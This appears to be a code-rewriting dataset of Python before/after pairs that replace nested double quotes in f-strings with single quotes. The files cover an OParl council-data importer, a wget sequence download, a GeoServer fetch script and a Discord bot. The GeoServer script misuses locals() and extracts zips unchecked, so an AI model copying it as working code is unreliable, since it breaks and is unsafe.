response = requests_get(url)
content = response.content
content_type = response.headers.get("Content-Type")
return content, content_type
class SternbergLoader(BaseLoader):
empty_list_error = {
"error": "Die angeforderte Ressource wurde nicht gefunden.",
"code": 802,
"type": "SD.NET RIM Webservice",
}
empty_page = {"data": [], "links": {}, "pagination": {}}
def visit_object(self, response: JSON):
if response.get("type") == "https://schema.oparl.org/1.0/File":
if "accessUrl" in response:
response["accessUrl"] = response["accessUrl"].replace(
r"files//rim", r"files/rim"
)
if "downloadUrl" in response:
response["downloadUrl"] = response["downloadUrl"].replace(
r"files//rim", r"files/rim"
)
if response.get("type") == "https://schema.oparl.org/1.0/Body":
# Check for a missing leading zero
ags = response.get("ags")
if ags and len(ags) == 7:
# noinspection PyTypeChecker
response["ags"] = "0" + ags
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
if query is None:
query = dict()
try:
response = super().load(url, query) # type: Dict[str, Any]
except HTTPError as error:
# Sometimes, an error is returned when the list would have been empty
if (
error.response.status_code == 404
and "modified_since" in query
and error.response.json() == self.empty_list_error
):
response = self.empty_page
else:
raise error
# Sometime, an empty list is returned instead of an object with an empty list
if "modified_since" in query and response == []:
response = self.empty_page
if response.get("deleted", False) and "type" not in response:
response["type"] = (
"https://schema.oparl.org/1.0/" + url.split("/")[-2].title()
)
# Instead of the body list, there's only a body
# https://ris.krefeld.de/webservice/oparl/v1.0/body
if url.endswith("/body") and "id" in response:
response = {"data": [response], "pagination": {}, "links": {}}
if "/body" in url:
# Add missing "type"-attributes in body-lists
if "data" in response:
for data in response["data"]:
if "location" in data.keys() and isinstance(data["location"], dict):
data["location"][
"type"
] = "https://schema.oparl.org/1.0/Location"
# There are deleted entries in unfiltered external lists (which they shouldn't) and then
# they don't even have type attributes (which are mandatory)
for entry in response["data"][:]:
if entry.get("deleted") and "type" not in entry:
response["data"].remove(entry)
# Add missing "type"-attributes in single bodies
if "location" in response.keys() and isinstance(response["location"], dict):
response["location"]["type"] = "https://schema.oparl.org/1.0/Location"
# Location in Person must be a url, not an object
if "/person" in url and "data" in response:
for data in response["data"]:
if "location" in data and isinstance(data["location"], dict):
data["location"] = data["location"]["id"]
if "/organization" in url and "data" in response:
for data in response["data"]:
if "id" in data and "type" not in data:
data["type"] = "https://schema.oparl.org/1.0/Organization"
if "/membership" in url:
# If an array is returned instead of an object, we just skip all list entries except for the last one
if isinstance(response, list):
response = response[0]
if "/person" in url:
if "location" in response and not isinstance(response["location"], str):
response["location"] = response["location"]["id"]
if "/meeting" in url:
if "location" in response and not isinstance(response["location"], str):
response["location"]["type"] = "https://schema.oparl.org/1.0/Location"
if "data" in response:
for data in response["data"]:
self.visit_object(data)
else:
self.visit_object(response)
return response
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
try:
content, content_type = super().load_file(url)
except HTTPError as error:
# Sometimes (if there's a dot in the filename(?)), the extension gets overriden
# by repeating the part after the dot in the extension-less filename
splitted = error.response.url.split(".")
if (
error.response.status_code == 404
and len(splitted) > 2
and splitted[-2] == splitted[-1]
):
new_url = ".".join(splitted[:-1]) + ".pdf"
content, content_type = super().load_file(new_url)
else:
raise error
if content_type == "application/octetstream; charset=UTF-8":
content_type = None
return content, content_type
class CCEgovLoader(BaseLoader):
def visit(self, data: JSON):
"""Removes quirks like `"streetAddress": " "` in Location"""
# `"auxiliaryFile": { ... }` -> `"auxiliaryFile": [{ ... }]`
if "auxiliaryFile" in data and isinstance(data["auxiliaryFile"], dict):
logger.warning(
f"auxiliaryFile is supposed to be an array of objects, "
f"but is an object (in {data.get("id")})"
)
data["auxiliaryFile"] = [data["auxiliaryFile"]]
for key, value in data.copy().items():
if isinstance(value, dict):
self.visit(value)
if isinstance(value, list):
for i in value:
if isinstance(i, dict):
self.visit(i)
elif isinstance(value, str):
if value == "N/A" or not value.strip():
del data[key]
def load(self, url: str, query: Optional[dict] = None) -> JSON:
logger.debug(f"Loader is loading {url}")
if query is None:
query = dict()
try:
response = requests_get(url, params=query)
except HTTPError as e:
if e.response.status_code == 500:
logger.error(f"Got an 500 for a CC e-gov request, retrying: {e}")
response = requests_get(url, params=query)
else:
raise
text = response.text
try:
data = json.loads(text)
except JSONDecodeError:
logger.error(
f"The server returned invalid json. This is a bug in the OParl implementation: {url}"
)
# Hack with based on std json code to load broken json where the control characters (U+0000 through
# U+001F except \n) weren't properly escaped
ESCAPE = re.compile(r"[\x00-\x09\x0B-\x1f]")
ESCAPE_DCT = {}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), "\\u{0:04x}".format(i))
def replace(match):
return ESCAPE_DCT[match.group(0)]
text = ESCAPE.sub(replace, text)
data = json.loads(text)
if data is None: # json() can actually return None
data = dict()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data["id"]}")
self.visit(data)
return data
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
"""Returns the content and the content type"""
response = requests_get(url)
content = response.content
content_type = response.headers.get("Content-Type")
return content, content_type
class SomacosLoader(BaseLoader):
max_retries: int = 3
error_sleep_seconds: int = 5
def get_with_retry_on_500(self, url: str) -> Response:
"""Custom retry logic with logging and backoff"""
current_try = 1
while True:
try:
return requests_get(url)
except HTTPError as e:
if e.response.status_code == 500:
if current_try == self.max_retries:
logger.error(
f"Request failed {self.max_retries} times with an Error 500, aborting: {e}"
)
raise
else:
logger.error(
f"Got an 500 for a Somacos request, "
f"retrying after sleeping {self.error_sleep_seconds}s: {e}"
)
time.sleep(self.error_sleep_seconds)
current_try += 1
continue
else:
raise
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
if query:
# Somacos doesn't like encoded urls
url = (
url
+ "?"
+ "&".join([key + "=" + value for key, value in query.items()])
)
logger.debug(f"Loader is loading {url}")
response = self.get_with_retry_on_500(url)
data = response.json()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data["id"]}")
return data
def get_loader_from_system(entrypoint: str) -> BaseLoader:
response = requests_get(entrypoint)
system = response.json()
if system.get("contactName") == "STERNBERG Software GmbH & Co. KG":
logger.info("Using Sternberg patches")
return SternbergLoader(system)
elif (
system.get("vendor") == "http://cc-egov.de/"
or system.get("vendor") == "https://www.cc-egov.de"
):
logger.info("Using CC e-gov patches")
return CCEgovLoader(system)
elif (
system.get("vendor") == "http://www.somacos.de"
or system.get("product")
== "Sitzungsmanagementsystem Session Copyright SOMACOS GmbH & Co. KG"
):
logger.info("Using Somacos patches ")
return SomacosLoader(system)
else:
logger.info("Using no vendor specific patches")
return BaseLoader(system)
def get_loader_from_body(body_id: str) -> BaseLoader:
"""
Assumptions:
* The body->system link hasn't changed
* The system might have, e.g. to a newer version where we don't workarounds anymore
"""
cached_body = CachedObject.objects.filter(url=body_id).first()
if cached_body:
logger.info(f"The body {body_id} is cached")
system_id = cached_body.data["system"]
else:
logger.info(f"Fetching the body {body_id}")
response = requests_get(body_id)
data = response.json()
CachedObject.objects.create(
url=data["id"], oparl_type=data["type"], data=data, to_import=False
)
system_id = data["system"]
return get_loader_from_system(system_id)
| import json
import logging
import re
import time
from json import JSONDecodeError
from typing import Optional, Tuple, Dict, Any
from requests import HTTPError, Response
from importer import JSON
from importer.functions import requests_get
from importer.models import CachedObject
logger = logging.getLogger(__name__)
class BaseLoader:
"""Provides a json and file download function.
This class can be overwritten for vendor specific fixups
"""
def __init__(self, system: JSON) -> None:
self.system = system
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
logger.debug(f"Loader is loading {url}")
if query is None:
query = dict()
response = requests_get(url, params=query)
data = response.json()
if data is None: # json() can actually return None
data = dict()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data['id']}")
return data
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
"""Returns the content and the content type"""
response = requests_get(url)
content = response.content
content_type = response.headers.get("Content-Type")
return content, content_type
class SternbergLoader(BaseLoader):
empty_list_error = {
"error": "Die angeforderte Ressource wurde nicht gefunden.",
"code": 802,
"type": "SD.NET RIM Webservice",
}
empty_page = {"data": [], "links": {}, "pagination": {}}
def visit_object(self, response: JSON):
if response.get("type") == "https://schema.oparl.org/1.0/File":
if "accessUrl" in response:
response["accessUrl"] = response["accessUrl"].replace(
r"files//rim", r"files/rim"
)
if "downloadUrl" in response:
response["downloadUrl"] = response["downloadUrl"].replace(
r"files//rim", r"files/rim"
)
if response.get("type") == "https://schema.oparl.org/1.0/Body":
# Check for a missing leading zero
ags = response.get("ags")
if ags and len(ags) == 7:
# noinspection PyTypeChecker
response["ags"] = "0" + ags
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
if query is None:
query = dict()
try:
response = super().load(url, query) # type: Dict[str, Any]
except HTTPError as error:
# Sometimes, an error is returned when the list would have been empty
if (
error.response.status_code == 404
and "modified_since" in query
and error.response.json() == self.empty_list_error
):
response = self.empty_page
else:
raise error
# Sometime, an empty list is returned instead of an object with an empty list
if "modified_since" in query and response == []:
response = self.empty_page
if response.get("deleted", False) and "type" not in response:
response["type"] = (
"https://schema.oparl.org/1.0/" + url.split("/")[-2].title()
)
# Instead of the body list, there's only a body
# https://ris.krefeld.de/webservice/oparl/v1.0/body
if url.endswith("/body") and "id" in response:
response = {"data": [response], "pagination": {}, "links": {}}
if "/body" in url:
# Add missing "type"-attributes in body-lists
if "data" in response:
for data in response["data"]:
if "location" in data.keys() and isinstance(data["location"], dict):
data["location"][
"type"
] = "https://schema.oparl.org/1.0/Location"
# There are deleted entries in unfiltered external lists (which they shouldn't) and then
# they don't even have type attributes (which are mandatory)
for entry in response["data"][:]:
if entry.get("deleted") and "type" not in entry:
response["data"].remove(entry)
# Add missing "type"-attributes in single bodies
if "location" in response.keys() and isinstance(response["location"], dict):
response["location"]["type"] = "https://schema.oparl.org/1.0/Location"
# Location in Person must be a url, not an object
if "/person" in url and "data" in response:
for data in response["data"]:
if "location" in data and isinstance(data["location"], dict):
data["location"] = data["location"]["id"]
if "/organization" in url and "data" in response:
for data in response["data"]:
if "id" in data and "type" not in data:
data["type"] = "https://schema.oparl.org/1.0/Organization"
if "/membership" in url:
# If an array is returned instead of an object, we just skip all list entries except for the last one
if isinstance(response, list):
response = response[0]
if "/person" in url:
if "location" in response and not isinstance(response["location"], str):
response["location"] = response["location"]["id"]
if "/meeting" in url:
if "location" in response and not isinstance(response["location"], str):
response["location"]["type"] = "https://schema.oparl.org/1.0/Location"
if "data" in response:
for data in response["data"]:
self.visit_object(data)
else:
self.visit_object(response)
return response
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
try:
content, content_type = super().load_file(url)
except HTTPError as error:
# Sometimes (if there's a dot in the filename(?)), the extension gets overriden
# by repeating the part after the dot in the extension-less filename
splitted = error.response.url.split(".")
if (
error.response.status_code == 404
and len(splitted) > 2
and splitted[-2] == splitted[-1]
):
new_url = ".".join(splitted[:-1]) + ".pdf"
content, content_type = super().load_file(new_url)
else:
raise error
if content_type == "application/octetstream; charset=UTF-8":
content_type = None
return content, content_type
class CCEgovLoader(BaseLoader):
def visit(self, data: JSON):
"""Removes quirks like `"streetAddress": " "` in Location"""
# `"auxiliaryFile": { ... }` -> `"auxiliaryFile": [{ ... }]`
if "auxiliaryFile" in data and isinstance(data["auxiliaryFile"], dict):
logger.warning(
f"auxiliaryFile is supposed to be an array of objects, "
f"but is an object (in {data.get('id')})"
)
data["auxiliaryFile"] = [data["auxiliaryFile"]]
for key, value in data.copy().items():
if isinstance(value, dict):
self.visit(value)
if isinstance(value, list):
for i in value:
if isinstance(i, dict):
self.visit(i)
elif isinstance(value, str):
if value == "N/A" or not value.strip():
del data[key]
def load(self, url: str, query: Optional[dict] = None) -> JSON:
logger.debug(f"Loader is loading {url}")
if query is None:
query = dict()
try:
response = requests_get(url, params=query)
except HTTPError as e:
if e.response.status_code == 500:
logger.error(f"Got an 500 for a CC e-gov request, retrying: {e}")
response = requests_get(url, params=query)
else:
raise
text = response.text
try:
data = json.loads(text)
except JSONDecodeError:
logger.error(
f"The server returned invalid json. This is a bug in the OParl implementation: {url}"
)
# Hack with based on std json code to load broken json where the control characters (U+0000 through
# U+001F except \n) weren't properly escaped
ESCAPE = re.compile(r"[\x00-\x09\x0B-\x1f]")
ESCAPE_DCT = {}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), "\\u{0:04x}".format(i))
def replace(match):
return ESCAPE_DCT[match.group(0)]
text = ESCAPE.sub(replace, text)
data = json.loads(text)
if data is None: # json() can actually return None
data = dict()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data['id']}")
self.visit(data)
return data
def load_file(self, url: str) -> Tuple[bytes, Optional[str]]:
"""Returns the content and the content type"""
response = requests_get(url)
content = response.content
content_type = response.headers.get("Content-Type")
return content, content_type
class SomacosLoader(BaseLoader):
max_retries: int = 3
error_sleep_seconds: int = 5
def get_with_retry_on_500(self, url: str) -> Response:
"""Custom retry logic with logging and backoff"""
current_try = 1
while True:
try:
return requests_get(url)
except HTTPError as e:
if e.response.status_code == 500:
if current_try == self.max_retries:
logger.error(
f"Request failed {self.max_retries} times with an Error 500, aborting: {e}"
)
raise
else:
logger.error(
f"Got an 500 for a Somacos request, "
f"retrying after sleeping {self.error_sleep_seconds}s: {e}"
)
time.sleep(self.error_sleep_seconds)
current_try += 1
continue
else:
raise
def load(self, url: str, query: Optional[Dict[str, str]] = None) -> JSON:
if query:
# Somacos doesn't like encoded urls
url = (
url
+ "?"
+ "&".join([key + "=" + value for key, value in query.items()])
)
logger.debug(f"Loader is loading {url}")
response = self.get_with_retry_on_500(url)
data = response.json()
if "id" in data and data["id"] != url:
logger.warning(f"Mismatch between url and id. url: {url} id: {data['id']}")
return data
def get_loader_from_system(entrypoint: str) -> BaseLoader:
response = requests_get(entrypoint)
system = response.json()
if system.get("contactName") == "STERNBERG Software GmbH & Co. KG":
logger.info("Using Sternberg patches")
return SternbergLoader(system)
elif (
system.get("vendor") == "http://cc-egov.de/"
or system.get("vendor") == "https://www.cc-egov.de"
):
logger.info("Using CC e-gov patches")
return CCEgovLoader(system)
elif (
system.get("vendor") == "http://www.somacos.de"
or system.get("product")
== "Sitzungsmanagementsystem Session Copyright SOMACOS GmbH & Co. KG"
):
logger.info("Using Somacos patches ")
return SomacosLoader(system)
else:
logger.info("Using no vendor specific patches")
return BaseLoader(system)
def get_loader_from_body(body_id: str) -> BaseLoader:
"""
Assumptions:
* The body->system link hasn't changed
* The system might have, e.g. to a newer version where we don't workarounds anymore
"""
cached_body = CachedObject.objects.filter(url=body_id).first()
if cached_body:
logger.info(f"The body {body_id} is cached")
system_id = cached_body.data["system"]
else:
logger.info(f"Fetching the body {body_id}")
response = requests_get(body_id)
data = response.json()
CachedObject.objects.create(
url=data["id"], oparl_type=data["type"], data=data, to_import=False
)
system_id = data["system"]
return get_loader_from_system(system_id)
|
"""Download"""
import subprocess
from src.helpers import logger
LOG = logger.getLogger(__name__)
def run(settings: dict):
"""Download"""
sequences_file = settings['downloads']['sequences']
LOG.info(f"Downloading {sequences_file}")
subprocess.run([
'wget',
'-q',
sequences_file,
'-O',
f"{settings["data_dir"]}/raw/{settings["pipeline"]}_sequences.fasta",
])
| """Download"""
import subprocess
from src.helpers import logger
LOG = logger.getLogger(__name__)
def run(settings: dict):
"""Download"""
sequences_file = settings['downloads']['sequences']
LOG.info(f"Downloading {sequences_file}")
subprocess.run([
'wget',
'-q',
sequences_file,
'-O',
f"{settings['data_dir']}/raw/{settings['pipeline']}_sequences.fasta",
])
|
from io import BytesIO
from zipfile import ZipFile
import requests
import os
from utilities.get_or_create_temporary_directory import get_temporary_directory as get_temp
def get_file_from_server(url, return_directory, **kwargs):
"""
This accepts a a URL and (ii) retrieves a zipped shapefile from the URL.
:param return_directory:
:param url: URL of zip file
:return: a list of files from th zip file
"""
valid_formats = {
"CSV": "text/csv",
"SHAPE-ZIP": "application/zip",
"JSON": "application/json"
}
try:
response = requests.get(url)
if 200 <= response.status_code <= 299:
if not response.headers["Content-Type"]:
raise ValueError("Couldn't figure out what type this is, sorry.")
content_type = [item.strip().split("=") for item in
response.headers["Content-Type"].split(";")]
if content_type[0][0] not in valid_formats.values():
raise ValueError(f"Looks like an invalid content type: {response.headers["Content-Type"]}")
if content_type[0][0] == "application/zip":
my_zipfile = ZipFile(BytesIO(response.content))
my_zipfile.extractall(path=return_directory)
return return_directory, my_zipfile.namelist()
else:
content_disposition = [item.strip().split("=") for item in
response.headers["Content-Disposition"].split(";")]
for item in content_type + content_disposition:
if len(item) == 2:
locals()[item[0]] = item[1]
if "filename" in kwargs:
locals()["filename"] = kwargs["filename"]
if not locals()["filename"]:
raise ValueError("Got data but couldn't find a filename for it.")
with open(os.path.join(return_directory, locals()["filename"]),
mode="w", encoding=locals().get("charset", "utf-8")) as fh:
fh.write(response.text)
return return_directory, locals()["filename"]
else:
raise ValueError(f"Bad status code: {response.status_code}")
except Exception as e:
print(f"{e}")
quit(1)
def main():
DEFAULT_FORMAT = {
"geoserver": "https://markfoley.info/geoserver",
"workspace": "census2011",
"dataset": "counties",
"output_format": "SHAPE-ZIP"
}
geoserver_target = {}
geoserver_target["geoserver"] = \
input(f"Input Geoserver URL or press ENTER for {DEFAULT_FORMAT["geoserver"]} ") or DEFAULT_FORMAT[
'geoserver']
geoserver_target["workspace"] = \
input(f"Input Workspace or press ENTER for {DEFAULT_FORMAT["workspace"]} ") or DEFAULT_FORMAT['workspace']
geoserver_target["dataset"] = \
input(f"Input Data Set or press ENTER for {DEFAULT_FORMAT["dataset"]} ") or DEFAULT_FORMAT['dataset']
geoserver_target["output_format"] = \
input(f"Output Format or press ENTER for {DEFAULT_FORMAT["output_format"]} ") or DEFAULT_FORMAT['output_format']
geoserver_target["output_format"] = geoserver_target["output_format"].upper()
my_temp_directory = get_temp(__file__)
url = f"{geoserver_target["geoserver"]}/{geoserver_target["workspace"]}/ows?service=WFS&version=1.0.0&" \
f"request=GetFeature&typeName={geoserver_target["workspace"]}:{geoserver_target["dataset"]}&" \
f"outputFormat={geoserver_target["output_format"]}"
my_files = get_file_from_server(url, my_temp_directory)
print(my_files)
if __name__ == '__main__':
main()
| from io import BytesIO
from zipfile import ZipFile
import requests
import os
from utilities.get_or_create_temporary_directory import get_temporary_directory as get_temp
def get_file_from_server(url, return_directory, **kwargs):
"""
This accepts a a URL and (ii) retrieves a zipped shapefile from the URL.
:param return_directory:
:param url: URL of zip file
:return: a list of files from th zip file
"""
valid_formats = {
"CSV": "text/csv",
"SHAPE-ZIP": "application/zip",
"JSON": "application/json"
}
try:
response = requests.get(url)
if 200 <= response.status_code <= 299:
if not response.headers["Content-Type"]:
raise ValueError("Couldn't figure out what type this is, sorry.")
content_type = [item.strip().split("=") for item in
response.headers["Content-Type"].split(";")]
if content_type[0][0] not in valid_formats.values():
raise ValueError(f"Looks like an invalid content type: {response.headers['Content-Type']}")
if content_type[0][0] == "application/zip":
my_zipfile = ZipFile(BytesIO(response.content))
my_zipfile.extractall(path=return_directory)
return return_directory, my_zipfile.namelist()
else:
content_disposition = [item.strip().split("=") for item in
response.headers["Content-Disposition"].split(";")]
for item in content_type + content_disposition:
if len(item) == 2:
locals()[item[0]] = item[1]
if "filename" in kwargs:
locals()["filename"] = kwargs["filename"]
if not locals()["filename"]:
raise ValueError("Got data but couldn't find a filename for it.")
with open(os.path.join(return_directory, locals()["filename"]),
mode="w", encoding=locals().get("charset", "utf-8")) as fh:
fh.write(response.text)
return return_directory, locals()["filename"]
else:
raise ValueError(f"Bad status code: {response.status_code}")
except Exception as e:
print(f"{e}")
quit(1)
def main():
DEFAULT_FORMAT = {
"geoserver": "https://markfoley.info/geoserver",
"workspace": "census2011",
"dataset": "counties",
"output_format": "SHAPE-ZIP"
}
geoserver_target = {}
geoserver_target["geoserver"] = \
input(f"Input Geoserver URL or press ENTER for {DEFAULT_FORMAT['geoserver']} ") or DEFAULT_FORMAT[
'geoserver']
geoserver_target["workspace"] = \
input(f"Input Workspace or press ENTER for {DEFAULT_FORMAT['workspace']} ") or DEFAULT_FORMAT['workspace']
geoserver_target["dataset"] = \
input(f"Input Data Set or press ENTER for {DEFAULT_FORMAT['dataset']} ") or DEFAULT_FORMAT['dataset']
geoserver_target["output_format"] = \
input(f"Output Format or press ENTER for {DEFAULT_FORMAT['output_format']} ") or DEFAULT_FORMAT['output_format']
geoserver_target["output_format"] = geoserver_target["output_format"].upper()
my_temp_directory = get_temp(__file__)
url = f"{geoserver_target['geoserver']}/{geoserver_target['workspace']}/ows?service=WFS&version=1.0.0&" \
f"request=GetFeature&typeName={geoserver_target['workspace']}:{geoserver_target['dataset']}&" \
f"outputFormat={geoserver_target['output_format']}"
my_files = get_file_from_server(url, my_temp_directory)
print(my_files)
if __name__ == '__main__':
main()
|
from colorama import Fore
from config import token, prefix, dev_mode
from helpers import print, parse, get_server_actions
import actions
import actions.readme
import actions.settings
import actions.propose_command
import discord
import math
if dev_mode:
import importlib
client = discord.Client()
@client.event
async def on_guild_join(guild):
print("Joined guild", guild)
@client.event
async def on_guild_update(old_guild, new_guild):
print("Guild was updated", old_guild, "=>", new_guild)
@client.event
async def on_guild_remove(guild):
print("Left guild", guild)
@client.event
async def on_member_ban(guild, user):
print("Guild", guild, "banned", user)
@client.event
async def on_message(message: discord.Message):
if message.author == client.user:
return
if not message.content.startswith(prefix) or len(message.content) < 1:
return
command, channel, params, mentions, author = parse(message)
if dev_mode:
importlib.reload(actions)
if command in get_server_actions(channel.guild.id)[0].keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing Server Command {command} {author.name}#{author.discriminator}: \"{message.content}\"")
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await get_server_actions(channel.guild.id)[0][command].execute(message)
elif command in actions.command_actions.keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing {command} {author.name}#{author.discriminator}: \"{message.content}\"")
if command in actions.readme.commands:
print(f"[{Fore.MAGENTA}{"System":20}{Fore.RESET}] Sending readme ({len(actions.actions)} actions)")
inline = True
if len(params) != 0:
if params[0] == '0' or params[0] == 'short':
inline = True
elif params[0] == '1' or params[0] == 'long':
inline = False
embed = discord.Embed()
embed.title = f"Liste der Befehle 1/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
page_itr = 1
for action in actions.actions:
cmd_append = ""
if 'readme' in action.commands:
cmd_append = " [Optional: Stil 0 (Default) / 1]"
elif action.requires_mention:
cmd_append = " [Person]"
elif action.accepts_mention:
cmd_append = " [Optional: Person]"
joined_commands = ' / '.join(action.commands)
joined_commands = (joined_commands[:50] + '..') if len(joined_commands) > 75 else joined_commands
embed.add_field(name='**' + joined_commands + cmd_append + '**', value=action.description, inline=inline)
itr += 1
if itr == 24:
page_itr += 1
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
embed = discord.Embed()
embed.title = f"Liste der Befehle {page_itr}/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
if len(embed.fields) != 0:
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
elif command in actions.settings.commands:
print("Sending settings:", params)
if len(params) > 0:
pass
else:
await channel.send("Coming soon™")
# embed = discord.Embed()
# embed.title = "Mögliche Einstellungen"
# embed.description = 'Prefix: ' + prefix + 'settings [Einstellung]'
# for setting_name in actions.settings.settings:
# embed.add_field(name='**' + ' / '.join(setting_name) + '**', value=actions.settings.settings[setting_name])
# await channel.send(embed=embed)
elif command in actions.propose_command.commands:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message, client)
else:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message)
@client.event
async def on_ready():
print(f"[{Fore.MAGENTA}{"System":20}{Fore.RESET}] Started")
print(f"[{Fore.MAGENTA}{"System":20}{Fore.RESET}] Name:", client.user.name)
print(f"[{Fore.MAGENTA}{"System":20}{Fore.RESET}] Id:", client.user.id)
print(f"[{Fore.MAGENTA}{"System":20}{Fore.RESET}] Current guilds (max 25):", [x["name"] for x in await client.fetch_guilds().get_guilds(25)])
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='+help'))
client.run(token)
| from colorama import Fore
from config import token, prefix, dev_mode
from helpers import print, parse, get_server_actions
import actions
import actions.readme
import actions.settings
import actions.propose_command
import discord
import math
if dev_mode:
import importlib
client = discord.Client()
@client.event
async def on_guild_join(guild):
print("Joined guild", guild)
@client.event
async def on_guild_update(old_guild, new_guild):
print("Guild was updated", old_guild, "=>", new_guild)
@client.event
async def on_guild_remove(guild):
print("Left guild", guild)
@client.event
async def on_member_ban(guild, user):
print("Guild", guild, "banned", user)
@client.event
async def on_message(message: discord.Message):
if message.author == client.user:
return
if not message.content.startswith(prefix) or len(message.content) < 1:
return
command, channel, params, mentions, author = parse(message)
if dev_mode:
importlib.reload(actions)
if command in get_server_actions(channel.guild.id)[0].keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing Server Command {command} {author.name}#{author.discriminator}: \"{message.content}\"")
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await get_server_actions(channel.guild.id)[0][command].execute(message)
elif command in actions.command_actions.keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing {command} {author.name}#{author.discriminator}: \"{message.content}\"")
if command in actions.readme.commands:
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Sending readme ({len(actions.actions)} actions)")
inline = True
if len(params) != 0:
if params[0] == '0' or params[0] == 'short':
inline = True
elif params[0] == '1' or params[0] == 'long':
inline = False
embed = discord.Embed()
embed.title = f"Liste der Befehle 1/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
page_itr = 1
for action in actions.actions:
cmd_append = ""
if 'readme' in action.commands:
cmd_append = " [Optional: Stil 0 (Default) / 1]"
elif action.requires_mention:
cmd_append = " [Person]"
elif action.accepts_mention:
cmd_append = " [Optional: Person]"
joined_commands = ' / '.join(action.commands)
joined_commands = (joined_commands[:50] + '..') if len(joined_commands) > 75 else joined_commands
embed.add_field(name='**' + joined_commands + cmd_append + '**', value=action.description, inline=inline)
itr += 1
if itr == 24:
page_itr += 1
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
embed = discord.Embed()
embed.title = f"Liste der Befehle {page_itr}/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
if len(embed.fields) != 0:
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
elif command in actions.settings.commands:
print("Sending settings:", params)
if len(params) > 0:
pass
else:
await channel.send("Coming soon™")
# embed = discord.Embed()
# embed.title = "Mögliche Einstellungen"
# embed.description = 'Prefix: ' + prefix + 'settings [Einstellung]'
# for setting_name in actions.settings.settings:
# embed.add_field(name='**' + ' / '.join(setting_name) + '**', value=actions.settings.settings[setting_name])
# await channel.send(embed=embed)
elif command in actions.propose_command.commands:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message, client)
else:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message)
@client.event
async def on_ready():
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Started")
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Name:", client.user.name)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Id:", client.user.id)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Current guilds (max 25):", [x["name"] for x in await client.fetch_guilds().get_guilds(25)])
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='+help'))
client.run(token)
|
